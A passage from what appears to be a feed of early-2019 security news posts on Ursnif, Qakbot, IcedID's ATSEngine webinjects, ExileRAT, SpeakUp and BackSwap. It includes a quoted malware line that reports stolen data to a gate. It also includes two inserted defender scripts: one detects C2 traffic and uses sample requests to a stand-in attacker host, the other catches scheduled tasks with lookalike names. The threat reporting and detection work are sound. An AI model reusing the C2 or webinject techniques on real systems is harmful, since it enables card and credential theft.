As stated first by us in the previous Ursnif analysis in December 2018 and then by Cisco Talos Intelligence in January 2019, this new Ursnif sample also uses the same APC injection technique to instill its final binary into the explorer.exe process, along with obfuscation and steganography to hide its malicious behaviour. Ursnif is more active and widespread than yesterday; the contacted C2 is not reachable, but the malware implant is still alive because the crooks constantly change their C2 to divert tracking and analysis.

Yoroi ZLab – Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidence to share with the research community.

Further information, including IoCs and Yara rules, is reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post Ursnif: Long Live the Steganography and AtomBombing! appeared first on Security Affairs.

Smashing Security #114: Darknet Diaries, death, and beauty apps

Jack Rhysider from the “Darknet Diaries” podcast joins us to chat about his interview with the elusive Hacker Giraffe, how a death is preventing cryptocurrency investors from reaching their money, and how ‘beauty camera’ apps are redirecting users to phishing websites and stealing their selfies.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault.

Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware

Researchers discovered Geodo botnets using a new spam campaign to deliver samples of Qakbot malware.

Cofense observed the botnets delivering non-Geodo malware since at least Jan. 28 via increasingly targeted phishing efforts. The attack begins when a user receives a phishing email containing a weaponized Microsoft Office document. That file contains malicious embedded macros that, when enabled, directly deliver Qakbot malware to the victim’s device. Researchers also witnessed the campaign leveraging IcedID, another banking Trojan, as its final payload.

In both cases, the campaign ends by replacing the binary content with that of calc.exe. This tactic is designed to help the campaign hide in plain sight, which signals Geodo’s evolution as a digital threat. Cofense found additional evidence of this evolution in Geodo’s use of targeted addressing, internal signatures and previous threads to prey on state-level government departments in the U.S. as part of a related malware campaign.

A Surge in Banking Trojans

This attack campaign comes amid a rise in activity for banking Trojans such as Qakbot and IcedID. Check Point observed a 50 percent increase in banking Trojan activity in the first half of 2018, with Dorkbot and Ramnit earning spots on the company’s “Most Wanted Malware” list for June of that year. Two months later, Ramnit placed even higher on Check Point’s monthly malware index.

Other security companies have also observed this trend among banking Trojans. For example, Kaspersky Lab detected 61,000 installation packages for mobile banking malware in Q2 2018 — more than a threefold growth over the previous quarter.

How to Defend Against Threats Like Qakbot Malware

Security professionals can help defend against digital threats like Qakbot malware by using tools such as VBA editor to analyze Office documents for malicious macros. Organizations should also lead by example and implement two-factor authentication (2FA) to prevent digital attackers from accessing and weaponizing their business email accounts.

The post Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware appeared first on Security Intelligence.

Monero Price Analysis: XMR/USD Set for Critical Retest of December 2018 Low; Monero Still Being Mined Using Malware

The Monero price on Wednesday is seen nursing minor losses of around 1%. However, price action is very much vulnerable to further downside risks. XMR/USD price behavior has formed a bearish flag pattern structure, which is subject to further downside risks. The key near-term level of support that would be noted is $42. Recent Price […]

The post Monero Price Analysis: XMR/USD Set for Critical Retest of December 2018 Low; Monero Still Being Mined Using Malware appeared first on Hacked: Hacking Finance.

Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool, a simple but interesting catching tool based on static YARA rules.

I’ve been working in cybersecurity for more than 10 years. During my career, I’ve held numerous roles that had me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help with a decision or to solve a technical question, I started by searching on “sourceforge/github” for something that would fit my needs. If what I needed wasn’t there, I built it on my own using what was available at the time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce you to a simple but interesting malware catching tool based on static YARA rules that is available HERE.

It takes sample feeds and analyses them against hundreds of YARA rules. Some of them are publicly available; others I have written on my own. The engine is quite slow right now, but it has analysed several recent samples. You might decide to dig into the last processed samples by clicking on a table row (which highlights the last 10 processed samples) or to search for a specific hash by pasting your desired SHA256 and clicking on the “Search” button.

In both cases, a modal form will appear showing the rules that match the hash you asked for. Since it’s a personal platform, it could be quite slow for now. Hope you enjoy it! Have fun

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I’ve also been put in charge of testing the uVote voting system from the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to broaden my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.

ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help disseminate reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitated redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server, which revealed the following code. Encoding is a common strategy to pack code and make it more compact.

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from home_link, appending the ssid= of the infected user’s device along with the current calendar date.

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name and purpose:

  • isFrame(): Checks for frames on the website to look for potential third-party security controls.
  • isValidCardNumber(a): Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.
  • onLoaded(): The main function that sets off the data grabbing process.
  • addLog(a,b,c,d): Adds new logs to the reports section in the attack server.
  • writeLog(): Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + "&pkey=" + urlEncode(pkey) + "&ssid=" + b, b)
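One defender-side way to hunt for the gate traffic described above (the bot authenticating to home_link/gate.php and writeLog() appending pkey and ssid to every report) is to look for those parameters in egress proxy logs. The script below is an added example, not code from the IBM X-Force article or from the malware; the log layout, host names and values are constructed placeholders.

```python
"""Flag proxy-log requests that look like IcedID/ATSEngine gate traffic.

Added example, not code from the IBM X-Force article or from the malware.
The article shows the bot talking to home_link/gate.php and the writeLog()
routine building gate_link + a + "&pkey=" + urlEncode(pkey) + "&ssid=" + b.
This script parses constructed proxy log lines (a simple
"timestamp client_ip method url" layout, an assumption) and flags requests
whose query string carries both a pkey and an ssid parameter, ranking a
gate.php path higher than any other path.
"""
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines; hosts and values are placeholders.
SAMPLE_PROXY_LOG = """\
2019-02-05T10:01:02Z 10.0.0.15 GET http://attacker-server.example/gate.php?a=1&pkey=Ab1cd23&ssid=BOT0001
2019-02-05T10:01:03Z 10.0.0.15 GET https://shop.example/account/login
2019-02-05T10:01:05Z 10.0.0.15 GET http://attacker-server.example/inj/ccgrab.js?ssid=BOT0001&pkey=Ab1cd23
2019-02-05T10:01:09Z 10.0.0.22 GET https://cdn.example/app.js?ssid=abc
2019-02-05T10:01:12Z 10.0.0.15 POST https://shop.example/checkout
"""

# The parameter pair the article shows on every report to the attack server.
REQUIRED_PARAMS = ("pkey", "ssid")


def parse_log_line(line: str):
    """Split one constructed log line into (timestamp, client, method, url)."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4:
        return None
    return tuple(parts)


def classify_url(url: str) -> Optional[str]:
    """Return 'gate' for a gate.php request carrying pkey and ssid,
    'pkey-ssid' for any other URL carrying both, or None when benign."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not all(p in query for p in REQUIRED_PARAMS):
        return None
    if parts.path.lower().endswith("/gate.php"):
        return "gate"
    return "pkey-ssid"


def find_gate_traffic(log_text: str):
    """Return one dict per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        ts, client, method, url = parsed
        verdict = classify_url(url)
        if verdict is None:
            continue
        query = parse_qs(urlsplit(url).query, keep_blank_values=True)
        findings.append({
            "timestamp": ts,
            "client": client,
            "method": method,
            "host": urlsplit(url).hostname,
            "verdict": verdict,
            "ssid": query["ssid"][0],  # bot identifier the panel keys on
        })
    return findings


def clients_by_host(findings):
    """Group flagged client IPs by contacted host, to pivot on the server."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["host"], set()).add(f["client"])
    return grouped


if __name__ == "__main__":
    hits = find_gate_traffic(SAMPLE_PROXY_LOG)
    for hit in hits:
        print(hit)
    print(clients_by_host(hits))
```

A 'pkey-ssid' hit without a gate.php path is worth checking against the script-loader behaviour described earlier, since the second-stage script is fetched with the same ssid appended.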

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Speak Up Malware Targets Linux, Mac in New Campaign

Linux servers are the target of a new crypto-mining campaign in which a malware dubbed “Speak Up” implants a backdoor Trojan by exploiting known vulnerabilities in six different Linux distributions, according

The post Speak Up Malware Targets Linux, Mac in New Campaign appeared first on The Cyber Security Place.

New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using a new LuckyCat-linked RAT dubbed ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document, the messages are reaching people in a mailing list run by the Central Tibetan Administration (CTA).

ExileRAT campaign

The nature of the malware and of the targets suggests the involvement of a nation-state actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say. 

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website; it was sent by the attackers to all subscribers of the CTA mailing list.

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx.” The researchers noticed that the standard Reply-To header used by the CTA mailings had been modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.

The weaponized documents exploit CVE-2017-0199, a zero-day arbitrary code execution vulnerability that Microsoft fixed in April 2017 and that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub; the researchers also noticed that the PPSX attempts to contact iplocation to perform geo-location lookups.

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScript while also using cmd.exe to create a scheduled task called “Diagnostic_System_Host.” The name is similar to the legitimate system task name “Diagnostic System Host,” differing only by the underscores.

The ExileRAT used in this campaign supports commands to retrieve system information (i.e. computer name, username, drive listing, network adapters, and process names), exfiltrate data, and execute or terminate processes.

Talos pointed out that C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 
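The scheduled-task name in this campaign differs from the legitimate “Diagnostic System Host” only by its underscores, which is exactly the kind of lookalike a periodic task inventory can catch. The script below is an added example (not part of the article or the Talos report): it normalizes task names and flags any that match an allow-listed legitimate name only after normalization. The allow-list and the schtasks-style listing are constructed for the example.

```python
"""Flag scheduled-task names that masquerade as a legitimate Windows task.

Added example, not code from the article or from Talos. It normalizes task
names by lowercasing and dropping underscores, spaces and hyphens, then flags
any task that matches a known-good name after normalization but not before
it, as "Diagnostic_System_Host" does against "Diagnostic System Host". Input
is a constructed listing in the shape of `schtasks /query /fo csv /nh`
output; the legitimate-name list is an assumption, not a complete inventory.
"""
import csv
import io
import re

# Assumed allow-list of legitimate task names (constructed for the example).
KNOWN_GOOD_TASKS = {
    "Diagnostic System Host",
    "Microsoft Compatibility Appraiser",
    "ProactiveScan",
}

# Constructed sample in the shape of `schtasks /query /fo csv /nh`:
# "TaskName","Next Run Time","Status"
SAMPLE_SCHTASKS_CSV = (
    '"\\Microsoft\\Windows\\DiskDiagnostic\\Diagnostic System Host","N/A","Ready"\n'
    '"\\Diagnostic_System_Host","2/5/2019 9:00:00 AM","Ready"\n'
    '"\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser","N/A","Ready"\n'
    '"\\Backup Job","2/5/2019 10:00:00 PM","Ready"\n'
)

# Characters an imitator can swap without changing how the name reads.
_SEPARATORS = re.compile(r"[\s_\-]+")


def normalize(name: str) -> str:
    """Collapse case and separator characters so lookalikes compare equal."""
    return _SEPARATORS.sub("", name).lower()


def leaf_name(task_path: str) -> str:
    """Return the final path component of a schtasks task path."""
    return task_path.rstrip("\\").split("\\")[-1]


def find_lookalike_tasks(schtasks_csv: str, known_good=KNOWN_GOOD_TASKS):
    """Return (task_path, legitimate_name) pairs for tasks that masquerade.

    A task is flagged when its leaf name is not an exact known-good name but
    normalizes to the same string as one, i.e. it differs only by case,
    spaces, underscores or hyphens.
    """
    by_normalized = {normalize(n): n for n in known_good}
    hits = []
    for row in csv.reader(io.StringIO(schtasks_csv)):
        if not row:
            continue
        task_path = row[0]
        leaf = leaf_name(task_path)
        if leaf in known_good:
            continue  # exact legitimate name, wherever it lives in the tree
        match = by_normalized.get(normalize(leaf))
        if match is not None:
            hits.append((task_path, match))
    return hits


if __name__ == "__main__":
    for path, legit in find_lookalike_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"suspicious task {path!r} resembles legitimate task {legit!r}")
```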

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages

Researchers have discovered a new malware used to steal saved passwords and credit card details from browsers. In addition, it

CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS Messages on Latest Hacking News.

SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.

Security experts at Check Point discovered a new backdoor dubbed SpeakUp targeting Linux servers in East Asia and Latin America.

Malware researchers at Check Point have spotted a new Linux backdoor dubbed ‘SpeakUp’ targeting servers in East Asia and Latin America.

SpeakUp backdoor

The SpeakUp backdoor leverages known vulnerabilities in six different Linux distros, and it is also able to infect Mac systems. The Trojan spreads by exploiting remote code execution flaws; for the initial infection, the hackers leverage a recently disclosed flaw in ThinkPHP (CVE-2018-20062).

Researchers linked the author of the SpeakUp backdoor with the malware developer that goes online with the moniker of Zettabithf.

Most of the infected machines are in China, the same country where the sample analyzed by Check Point was spotted on January 14, 2019.

“The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.” reads the analysis published by the experts.

Once the system is infected, the backdoor connects to the command and control (C&C) server to register the machine. It gains persistence using cron and an internal mutex, so that only one instance remains alive at all times.

The backdoor supports the following commands:

  • newtask – to execute arbitrary code, download and execute a file, kill or uninstall a program, and send updated fingerprint data;
  • notask – sleep for 3 seconds and ask for additional command;
  • newerconfig – to update the downloaded miner configuration file.

The backdoor uses a Python script to scan and infect other Linux servers within internal and external subnets; it is also able to carry out brute-force attacks against admin panels.

The script attempts to exploit the following RCE vulnerabilities in the targeted servers:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution (exploit)
  • CVE-2017-10271: Oracle WebLogic wlswsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager – Command Execution (exploit)
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Further research allowed the experts to find the liteHTTP GitHub project, which has some modules similar to the SpeakUp Trojan.

“SpeakUp’s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners.” Check Point concludes.

“The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive,”

Pierluigi Paganini

(SecurityAffairs – SpeakUp, backdoor)

The post SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM. appeared first on Security Affairs.

Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan

Security researchers observed an attack campaign that is targeting Linux servers to install samples of SpeakUp, a new backdoor Trojan.

According to Check Point Research, the campaign is currently targeting servers in East Asia and Latin America. The attack begins with the exploitation of CVE-2018-20062, a reported vulnerability affecting ThinkPHP. The campaign then uses command injection techniques to upload a PHP shell, which is responsible for delivering and executing the SpeakUp Trojan as a Perl backdoor.

Upon execution, SpeakUp continuously communicates with its command and control (C&C) server to receive a variety of instructions. It can use the newtask command to execute arbitrary code or execute a file from a remote server, for example. This ability enables SpeakUp to deliver additional backdoors, each of which comes equipped with a Python script designed to scan and infect more Linux servers within its internal and external subnets.

Furthermore, the Trojan can leverage the newconfig command to update the configuration file for XMRig, a cryptocurrency miner that it serves to listening infected servers.

Linux Servers Under Attack

SpeakUp isn’t the only malware targeting Linux servers. On the contrary, these IT assets are under attack from a range of malicious software.

In December 2018, Slovakian security firm ESET identified 21 Linux malware families that serve as OpenSSH backdoors. Around the same time, Anomali Labs unveiled its discovery of Linux Rabbit and Rabbot, two malware families served by a campaign targeting Linux servers in Russia, South Korea, the U.K. and the U.S. that are both capable of installing crypto-miners.

Also in December, Bleeping Computer learned of a new campaign that had leveraged unsecured Intelligent Platform Management Interface (IPMI) cards to infect Linux servers with JungleSec ransomware.

How to Defend Against the SpeakUp Trojan

Security professionals can help defend against malware like SpeakUp by utilizing a unified endpoint management (UEM) tool to monitor assets such as Linux servers for malicious activity. Experts also recommend practicing timely patch management to defend endpoints against cryptocurrency miners, and investing in education and role-based training to help cultivate a security-aware workforce.

The post Attack Campaign Targets Linux Servers to Install New SpeakUp Trojan appeared first on Security Intelligence.

BackSwap and the danger of banking Trojans

BackSwap Banking Trojan

In the survival guide for million-dollar cyberattacks that we published in 2017, we warned how dangerous banking Trojans can be, and highlighted them as one of the key trends in financial cybercrime, along with phishing and keyloggers.  Banking Trojans steal their victim’s online identity and use this information to trick financial institutions and steal money from their accounts. Generally this is done by installing applications or inserting malicious code into the browsers from which users access their bank accounts.

But over the last few years, it seems that the level of banking Trojan activity has decreased considerably. On the one hand, institutions have reacted to the threat by considerably improving their security and their customers’ authentication factors; one example of this is the implementation of virtual keyboards for user sign-in.  This way, it is not possible for a cyberattacker to use a keylogger to steal the details that the user enters with a physical keyboard.

On the other hand, developers have implemented barriers and mechanisms to make injecting code into browsers more complex. For this reason, as we have been pointing out for some time, cyberattackers have been focusing their efforts on other kinds of attacks that are simpler and more profitable, such as ransomware or cryptojacking.

However, in the last few weeks, banking Trojans have started to gain momentum once again, using new, alternative techniques, rather than infiltrating browsers directly. This is the case with BackSwap, a new banking Trojan that has managed to infiltrate several Spanish banks, and which could pose a serious threat to other companies, especially if it comes into contact with employees who work closely with banking institutions. But how does BackSwap work?

BackSwap and its new techniques

BackSwap is an improved and updated variant of the malware Tinba, which was developed in 2015. This malware was noteworthy because of its small size (between 10 and 50Kb) and its capacity to steal the user’s credentials. As ESET researchers discovered, there is one key difference between BackSwap and its predecessor and other code-injecting banking Trojans such as Zbot, Gozi or Dridex. The difference lies in its methodology, which circumvents browsers’ barriers and can be more difficult to detect for less modern cybersecurity solutions. There are three new techniques that BackSwap uses:

  • It detects when the user is accessing a banking institution online via a mechanism native to Windows called the “message loop”: BackSwap hooks the Windows message loop to search for patterns similar to a URL, such as “https” strings and other terms related to the name of a bank.
  • Once it detects that the browser is accessing and loading a banking website, BackSwap proceeds to manipulate the loaded content, but does not inject code directly into the browser. Rather, it simulates a user’s keystrokes, and copies the code to the clipboard, then pastes it to the developer’s console. All of this is done in a way that is invisible to the user.
  • Finally, an alternative method – and one that it seems to use more frequently than the previous technique – is to simulate pushing keys in the browser’s address bar: it simulates writing a JavaScript string, pastes the malicious code, and virtually presses enter in order to execute the code. Again, none of this is visible on the user’s screen, and nor does it leave any traces in the history.

How can we prevent it?

As is the case with other banking Trojans such as Trickbot, which we previously analyzed, the main attack vector for BackSwap is email. It is mainly spread via spam containing malicious files such as attached Word documents into which the malware is inserted. Once the file has been executed, it stays on the machine, waiting for the victim to access a banking-related website.

For this reason, the first line of prevention should be employee caution about suspicious emails with attachments. This is especially true of employees such as CFOs and members of the administration or accounting teams, whose roles involve a close working relationship with financial institutions. It is worth remembering that the subject line "Invoice" featured in 6 of the 10 most effective phishing campaigns of 2018.

Likewise, it is a very good idea to have advanced cybersecurity solutions with 360º monitoring, such as Panda Adaptive Defense. On one hand, it performs a complete scan of all emails and attachments in real time as soon as they enter the inbox. On the other hand, it constantly monitors employees' website use, detecting any suspicious activity in their computers' browsers. Advanced solutions like Adaptive Defense reduce the negative impact of banking Trojans as complex as BackSwap to a minimum.

The post BackSwap and the danger of banking Trojans appeared first on Panda Security Mediacenter.

Hackers Now Exploit Google Sheets To Spread CSV Malware

After previously exploiting Microsoft Excel for formula injection attacks, hackers have now turned their attention to Google Sheets for the

Hackers Now Exploit Google Sheets To Spread CSV Malware on Latest Hacking News.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

New cryptocurrency malware SpeakUp hits Linux & Mac devices

By Waqas

The IT security researchers at Check Point have identified a new malware called SpeakUp targeting Linux and macOS – The new findings prove that there has been a surge in malware attacks against Linux and Apple devices. SpeakUp is a new backdoor Trojan that is being distributed by cybercriminals through a malicious new campaign designed […]

This is a post from HackRead.com Read the original post: New cryptocurrency malware SpeakUp hits Linux & Mac devices

Experts found popular beauty apps in the Play Store including malicious code

Researchers at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were able to perform several malicious activities.

Crooks continue to abuse the Google Play store to distribute malicious apps. This time, experts at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were stealing users' photos.

The malicious apps in the Google Play Store have been downloaded more than 4 million times before they were removed.


